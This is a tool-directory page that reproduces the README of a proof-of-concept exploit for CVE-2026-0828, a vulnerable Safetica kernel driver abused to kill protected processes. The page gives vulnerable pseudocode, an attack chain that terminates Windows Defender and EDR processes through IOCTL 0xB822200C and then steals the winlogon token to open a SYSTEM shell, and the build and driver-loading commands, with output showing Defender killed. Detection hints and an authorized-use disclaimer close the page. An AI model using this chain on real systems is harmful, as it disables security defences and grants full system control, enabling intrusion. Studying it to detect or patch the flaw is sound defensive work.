Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cve-2026-0828 — Proof-of-concept exploit for CVE-2026-0828, a BYOVD vulnerability in Safetica ProcessMonitorDriver.sys allowing unprivileged termination of PPL-protected processes and local privilege escalation to SYSTEM via IOCTL abuse and token duplication. | Kitploit
Tools/GitHubGitHub/mein-0/cve-2026-0828
Privilege EscalationVulnerability AnalysisExploitationIDS/IPS EvasionLateral MovementPost-ExploitationRed TeamingPayload DevelopmentBinary Exploitation
GitHubmein-0/cve-2026-0828

cve-2026-0828

Proof-of-concept exploit for CVE-2026-0828, a BYOVD vulnerability in Safetica ProcessMonitorDriver.sys allowing unprivileged termination of PPL-protected processes and local privilege escalation to SYSTEM via IOCTL abuse and token duplication.

133 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View Repository

CVE-2026-0828 — Safetica ProcessMonitorDriver.sys BYOVD PoC

Safetica DLP kernel driver (ProcessMonitorDriver.sys) exposes an unauthenticated IOCTL that allows any user-mode caller to terminate arbitrary processes via ZwTerminateProcess in kernel context, bypassing PPL (Protected Process Light) protection.

CVSS: 8.8 (High) · Type: BYOVD, LPE · Platform: Windows x64


Vulnerability

The IRP_MJ_DEVICE_CONTROL handler for IOCTL 0xB822200C calls ZwOpenProcess with PROCESS_ALL_ACCESS (0x1FFFFF) and subsequently ZwTerminateProcess using a PID supplied directly from the input buffer — without any privilege or caller validation.

root@kitploit:~
// Vulnerable handler (IDA pseudocode)
ClientId.UniqueProcess = **(HANDLE **)(irp->AssociatedIrp.SystemBuffer);

ZwOpenProcess(&ProcessHandle, 0x1FFFFFu, &ObjectAttributes, &ClientId);
ZwTerminateProcess(ProcessHandle, 0);  // no SeSinglePrivilegeCheck, no ExGetPreviousMode check

Because the call originates in kernel context, PPL-protected processes (Windows Defender, EDR agents) can be terminated.

Affected versions: Safetica < 11.26.19 / < 10.5.150
Fixed in: Safetica 11.26.19, 11.29.8, 10.5.150 — privilege check added to IOCTL handler
References: KOSEC Advisory · CERT VU#818729


Attack Chain

root@kitploit:~
Admin privileges
    │
    ├─► Load ProcessMonitorDriver.sys
    │       sc create STProcessMonitor type=kernel binPath=...
    │
    ├─► PHASE 1: Kill EDR via IOCTL 0xB822200C
    │       DeviceIoControl(\\.\STProcessMonitorDriver, 0xB822200C, &pid, 8, ...)
    │       → ZwTerminateProcess(Defender/EDR, 0)  [kernel ctx, PPL bypassed]
    │
    └─► PHASE 2: Token duplication → SYSTEM shell
            AdjustTokenPrivileges(SeDebugPrivilege)
            OpenProcess(winlogon.exe)
            DuplicateTokenEx(TokenPrimary)
            CreateProcessWithTokenW(cmd.exe)
            → NT AUTHORITY\SYSTEM

Files

FileDescription
exploit.cFull PoC — kills EDR, spawns NT AUTHORITY\SYSTEM cmd.exe

Build

Requires Visual Studio (x64 Native Tools Command Prompt):

root@kitploit:~
cl.exe /W3 /O1 /nologo exploit.c /Fe:exploit.exe

Usage

Step 1 — Load the driver (Admin CMD):

root@kitploit:~
sc create STProcessMonitor type= kernel binPath= "C:\path\to\ProcessMonitorDriver.sys"
sc start STProcessMonitor

Step 2 — Run the PoC:

root@kitploit:~
exploit.exe

Expected output:

root@kitploit:~
[Phase 1] Killing EDR via CVE-2026-0828...
  MsMpEng.exe       PID 3412  -> KILLED
  NisSrv.exe        PID 4180  -> KILLED

SeDebugPrivilege enabled
winlogon.exe -> pid 560
[+] Got SYSTEM token handle.
[+] Token duplicated.
shell spawned

A new cmd.exe window opens as NT AUTHORITY\SYSTEM.


Detection

Event ID 7045 — new kernel service installation:

root@kitploit:~
Service Name:      STProcessMonitor
Service File Name: ...\ProcessMonitorDriver.sys
Service Type:      kernel mode driver

WDAC blocklist (SHA256):

root@kitploit:~
70bcec00c215fe52779700f74e9bd669ff836f594df92381cbfb7ee0568e7a8b

ETW: Monitor DeviceIoControl calls to \\.\STProcessMonitorDriver.


Tested On

  • Windows 10 22H2 x64

For authorized security research and lab use only. Do not use against systems you do not own or have written permission to test.

Download Tool